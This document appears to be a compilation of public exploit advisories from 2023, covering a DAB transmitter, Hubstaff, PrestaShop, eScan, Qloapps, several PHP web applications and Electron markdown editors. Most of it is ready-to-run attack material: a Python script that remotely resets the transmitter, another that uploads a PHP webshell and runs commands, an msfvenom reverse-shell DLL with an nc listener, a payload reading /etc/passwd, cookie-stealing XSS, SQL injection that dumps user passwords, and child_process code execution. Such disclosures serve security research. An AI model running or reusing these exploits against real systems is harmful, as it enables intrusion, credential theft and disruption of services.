'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5775 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') e='/system/api/deviceManagement.cgx' print('Calling object: ssbtObj') print('CGX fastcall: deviceManagement::reset') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber--', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'deviceManagement', 'ssbtObj':{ 'reset':'true' } } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-1)

# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) # Exploit Author: LiquidWorm Vendor: DB Elettronica Telecomunicazioni SpA Product web page: https://www.screen.it | https://www.dbbroadcast.com https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ Affected version: Firmware: 1.9.3 Bios firmware: 7.1 (Apr 19 2021) Gui: 2.46 FPGA: 169.55 uc: 6.15 Summary: Screen's new radio DAB Transmitter is reaching the highest technology level in both Digital Signal Processing and RF domain. SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the digital adaptive precorrection and configuatio flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support standards DAB, DAB+ and T-DMB and are compatible with major headend brands. Desc: Screen is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information including usernames and source IP addresses. Tested on: Keil-EWEB/2.1 MontaVista® Linux® Carrier Grade eXpress (CGX) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5776 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php 19.03.2023 -- $ curl 'http://SFTDAB/system/api/userManager.cgx' {"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}

*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking *#Date:* 14/05/2023 *#Exploit Author:* Ahsan Azad *#Vendor Homepage:* https://hubstaff.com/ *#Software Link:* https://app.hubstaff.com/download *#Version:* 1.6.13, 1.6.14 *#Tested On:* 64-bit operating system, x64-based processor *Description* Hubstaff is an employee work tracker with screenshots, timesheets, billing, in-depth reports, and more. During testing. It was found that the system32 subdirectory was missing a DLL library with the name *wow64log.dll* that had been required by the hubstaff's setup file during installation. Hence, using Metasploit's msfvenom to create a new wow64log.dll file, Tester was able to get a reverse shell locally. *Exploit* 1- Generate a dll file with the name wow64log.dll using the command: *msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll -o wow64log.dll* 2- Place the newly generated DLL to the *system32 *directory. 3- Start a listener on attacker's console using: *nc -lnvp <port_used_while_generating_DLL>* 4- Launch the exe. Reverse shell will be receive as: *C:\Windows>* *Attachments (For the understanding of verification team)* 1.png - Showing the wow64.dll was not found by the exe. [image: 1.png] 2.png - Showing how tester was able to generate a new dll using msfvenom on port 1337. [image: 2.png] 3.png - Showing a reverse connection received on the attacker's console at C:\Windows> by launching the exe.[image: 3.png]

# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution # Google Dork: NA # Date: 15/5/2023 # Exploit Author: Mesut Cetin # Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip # Version: 1.0 # Tested on: Kali Linux import sys import requests import subprocess import time if len(sys.argv) < 2: print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0]) print("Example: %s 192.168.106.130" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/kruxton/ajax.php?action=save_settings" def brute_force_timestamp(timestamp_prev, ip): progress = 0 webshell = None for i in range(20): for j in range(0, 1000, 20): timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php" response = requests.get(url) if response.status_code == 200: webshell = url break progress += 1 print(f"Attempt {progress}/400", end="\r") time.sleep(0.1) if progress >= 400: break if webshell or progress >= 400: break if webshell: print("\033[92m[+] Webshell found:", webshell, "\033[0m") else: print("\033[91m[-] Webshell not found\033[0m") return webshell def get_unix_timestamp(): timestamp = subprocess.check_output(['date', '+%s']).decode().strip() return int(timestamp) def extract_output(response_text): start_tag = "<pre>" end_tag = "</pre>" start_index = response_text.find(start_tag) end_index = response_text.find(end_tag) if start_index != -1 and end_index != -1 and start_index < end_index: output = response_text[start_index + len(start_tag):end_index] return output.strip() return None def code_execution(webshell): if not webshell: print("\033[91mWebshell URI not provided\033[0m") return while True: command = input("Enter command to execute (or 'exit' to quit): ") if command == 'exit': break url = webshell + f"?cmd={command}" response = requests.get(url) output = extract_output(response.text) if output: print("\033[93m[+] Output:\033[0m") print(output) else: print("\033[91m[-] No output received\033[0m") data = '''\ -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="name" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="email" [email protected] -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="contact" 9000000000 -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="about" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> -----------------------------49858899034227071432271107689--''' headers = { 'Host': f"{ip}", 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689', 'Content-Length': str(len(data)), 'Connection': 'close' } timestamp_prev = get_unix_timestamp() response = requests.post(url, data=data, headers=headers) if response.status_code == 200 and response.text == '1': print("[+] Timestamp: %s" % timestamp_prev) print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m") webshell = brute_force_timestamp(timestamp_prev, ip) code_execution(webshell) else: print("Did not worked")

Exploit Title: Prestashop 8.0.4 - CSV injection Application: prestashop Version: 8.0.4 Bugs: CSV Injection Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 14.05.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My Account then information ( http://localhost/index.php?controller=identity ) step 3. Set Email as =calc|a!z|@test.com step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI) payload: =calc|a!z|@test.com

#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE) #Application: SitemagicCMS #Version: 4.4.3 #Bugs: RCE #Technology: PHP #Vendor URL: https://sitemagic.org/Download.html #Software Link: https://github.com/Jemt/SitemagicCMS #Date of found: 14-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. go to content then files 2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?> 3. go to http://localhost/SitemagicCMS/files/images/shell.phar payload: <?php echo system("cat /etc/passwd"); ?> Poc request : POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1 Host: localhost Content-Length: 492 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf Connection: close ------WebKitFormBoundarywPUsZSbtgJ6nAn8W Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar" Content-Type: application/octet-stream <?php echo system('cat /etc/passwd'); ?> ------WebKitFormBoundarywPUsZSbtgJ6nAn8W Content-Disposition: form-data; name="SMPostBackControl" ------WebKitFormBoundarywPUsZSbtgJ6nAn8W Content-Disposition: form-data; name="SMRequestToken" 60a7a113cf94842a197912273825b421 ------WebKitFormBoundarywPUsZSbtgJ6nAn8W--

# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) # Date: 15 May 2023 # Exploit Author: Astik Rawat (ahrixia) # Vendor Homepage: https://qloapps.com/ # Software Link: https://github.com/webkul/hotelcommerce # Version: 1.5.2 # Tested on: Kali Linux 2022.4 # CVE : CVE-2023-30256 Description: A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence. Steps to exploit: 1) Go to Signin page on the system. 2) There are two parameters which can be exploited via XSS - back - email_create 2.1) Insert your payload in the "back"- GET and POST Request Proof of concept (Poc): The following payload will allow you to execute XSS - Payload (Plain text): xss onfocus=alert(1) autofocus= xss Payload (URL Encoded): xss%20onfocus%3dalert(1)%20autofocus%3d%20xss Full GET Request (back): [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d] 2.2) Insert your payload in the "email_create" - POST Request Only Proof of concept (Poc): The following payload will allow you to execute XSS - Payload (Plain text): xss><img src=a onerror=alert(document.cookie)>xss Payload (URL Encoded): xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss POST Request (email_create) (POST REQUEST DATA ONLY): [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated) # Date: 16/05/2023 # Exploit Author: Sahil Ojha # Vendor Homepage: https://www.escanav.com # Software Link: https://cl.escanav.com/ewconsole.dll # Version: 14.0.1400.2281 # Tested on: Windows # CVE : CVE-2023-31702 *Step of Reproduction/Proof of concept(POC)* 1. Login into the escan management console with a valid username and password as root user. 2. Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176 3. Inject the payload into the UsrId parameter to confirm the SQL injection as shown below: https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176 4. The time delay of 5 seconds confirmed that "UsrId" parameter was vulnerable to SQL Injection. Furthermore, it was also possible to dump all the databases and inject OS shell directly into the MS SQL Server using SQLMap tool.

# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting # Date: 2023-05-16 # Exploit Author: Sahil Ojha # Vendor Homepage: https://www.escanav.com # Software Link: https://cl.escanav.com/ewconsole.dll # Version: 14.0.1400.2281 # Tested on: Windows # CVE : CVE-2023-31703 *Step of Reproduction/ Proof of Concept(POC)* 1. Login into the eScan Management Console with a valid user credential. 2. Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P= 3. Now, Inject the Cross Site Scripting Payload in "from" parameter as shown below and a valid XSS pop up appeared. https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P= 4. By exploiting this vulnerability, any arbitrary attacker could have stolen an admin user session cookie to perform account takeover.

[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection [#] Exploit Date: May 16, 2023. [#] CVSS 3.1: 6.4 (Medium) [#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N [#] Tactic: Initial Access (TA0001) [#] Technique: Exploit Public-Facing Application (T1190) [#] Application Name: Affiliate Me [#] Application Version: 5.0.1 [#] Vendor: https://www.powerstonegh.com/ [#] Author: h4ck3r - Faisal Albuloushi [#] Contact: [email protected] [#] Blog: https://www.0wl.tech [#] Exploit: [path]/admin.php?show=reply&id=[Injected Query] [#] 3xample: [path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- - [#] Notes: - A normal admin can exploit this vulnerability to escalate his privileges to super admin.

# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution # Date: 2023-04-24 # Exploit Author: 8bitsec # CVE: CVE-2023-31873 # Vendor Homepage: https://github.com/mariuskueng/gin # Software Link: https://github.com/mariuskueng/gin # Version: 0.7.4 # Tested on: [Mac OS 13] Release Date: 2023-04-24 Product & Service Introduction: Javascript Markdown editor for Mac Technical Details & Description: A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following payload: <video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"> Opening the file in Gin will auto execute the Calculator application.

# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution # Date: 2023-04-27 # Exploit Author: 8bitsec # CVE: CVE-2023-31874 # Vendor Homepage: yank-note.com # Software Link: https://github.com/purocean/yn # Version: 3.52.1 # Tested on: [Ubuntu 22.04 | Mac OS 13] Release Date: 2023-04-27 Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement Technical Details & Description: A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following payload. Mac: <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>"> Ubuntu: <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>"> Opening the file in Yank Note will auto execute the Calculator application.

# Exploit Title: LeadPro CRM v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578 # Demo Site: https://demo.leadifly.in # Tested on: Kali Linux # CVE: N/A ### Request ### GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10 HTTP/1.1 Host: localhost Cookie: XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D; leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8 X-Xsrf-Token: eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0= Referer: https://localhost/admin/product Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close ### Parameter & Payloads ### Parameter: filters (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND (8549=8549&order=id desc&offset=0&limit=10

# Exploit Title: Smart School v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018 # Demo Site: https://demo.smart-school.in # Tested on: Kali Linux # CVE: N/A ### Request ### POST /course/filterRecords/ HTTP/1.1 Host: localhost Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 136 Origin: https://localhost Referer: https://localhost/course/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1 ### Parameter & Payloads ### Parameter: searchdata[0][searchfield] (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)-- hAHp&searchdata[0][searchvalue]=1

# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/stackposts-social-marketing-tool/21747459 # Demo Site: https://demo.stackposts.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /spmo/auth/login HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://localhost/spmo/ Content-Type: application/x-www-form-urlencoded Accept: application/json, text/javascript, */*; q=0.01 Content-Length: 104 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1* ### Parameter & Payloads ### Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1') AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg

# Exploit Title: Quicklancer v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135 # Demo Site: https://quicklancer.bylancer.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /php/user-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2; quickjob_view_counted=31; Quick_lang=arabic Content-Length: 93 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive action=searchStateCountry&dataString=deneme ### Parameter & Payloads ### Parameter: dataString (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo